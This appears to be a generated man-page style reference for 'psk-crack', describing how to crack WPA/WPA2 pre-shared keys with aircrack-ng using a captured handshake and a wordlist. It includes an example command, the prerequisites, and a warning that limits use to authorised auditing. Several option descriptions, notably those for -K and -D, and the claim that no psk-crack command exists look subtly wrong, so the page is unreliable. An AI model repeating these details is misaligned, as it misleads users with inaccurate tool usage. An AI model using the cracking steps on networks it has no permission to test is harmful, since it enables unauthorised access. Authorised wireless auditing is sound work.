psk-crack

The PSK cracking functionality is executed using the aircrack-ng command:

aircrack-ng [options] capture_file(s)

-w
    Specifies the path to a dictionary file (wordlist) containing potential passwords. Each line in the file is treated as a candidate PSK.

-b
    Filters the cracking attempt to a specific network by its BSSID (MAC address of the access point).

-e
    Filters the cracking attempt to a specific network by its ESSID (network name).

-p
    Specifies the number of CPU cores or threads to use for cracking, accelerating the process on multi-core systems.

-K
    Activates the WPA-PSK key calculation. Usually implied when using -w with WPA captures.

-D
    Enables debug output, useful for troubleshooting.

psk-crack refers to the process of recovering a WPA/WPA2 Pre-Shared Key (PSK) using a dictionary or brute-force attack. While there isn't a standalone Linux command named psk-crack that takes a capture file and wordlist directly as its primary function, this capability is prominently provided by the aircrack-ng suite. aircrack-ng is a powerful set of tools designed for auditing wireless networks. To 'psk-crack' using aircrack-ng, you typically need a captured 4-way WPA/WPA2 handshake (obtained using tools like airodump-ng) and a wordlist containing potential passwords. The command attempts to re-create the handshake with each word in the list until a match is found, revealing the PSK.

Legality: Using this functionality to crack networks you do not own or have explicit permission to test is illegal and unethical. It is intended for legitimate security auditing purposes.
Handshake Requirement: A valid 4-way WPA/WPA2 handshake must be present in the capture file for the cracking process to succeed.
Wordlist Quality: The success of a dictionary attack heavily depends on the quality and comprehensiveness of the provided wordlist. A poor wordlist will likely fail to find the password.
Time Consumption: Cracking can be a very time-consuming process, especially with long wordlists or complex passwords, potentially taking hours, days, or even longer.
Computational Resources: Cracking is CPU-intensive. Utilizing multiple CPU cores (with -p) can significantly speed up the process.

To attempt cracking a WPA/WPA2 PSK from a capture file named handshake.cap using a wordlist named rockyou.txt, you would execute:

aircrack-ng -w /path/to/rockyou.txt /path/to/handshake.cap

If the PSK is found within the wordlist, aircrack-ng will display it.

Before attempting to crack a PSK, ensure you have:
1. A wireless adapter capable of monitor mode (e.g., supported by airmon-ng).
2. A captured WPA/WPA2 4-way handshake. This typically involves capturing traffic while a legitimate client connects or re-connects to the target AP.
3. A comprehensive wordlist.

The concept of cracking WPA/WPA2 PSK emerged as vulnerabilities were discovered in the WPA protocol, particularly regarding dictionary attacks against the Pre-Shared Key. The aircrack-ng suite, which consolidates tools for wireless network auditing, became a prominent platform for implementing this functionality. Its development has focused on improving efficiency and supporting various hardware acceleration methods, making it a widely adopted tool for both ethical hacking and penetration testing within the wireless security domain since the mid-2000s.

aircrack-ng(1), airodump-ng(8), airmon-ng(8), aireplay-ng(8), cowpatty(1), hashcat(1)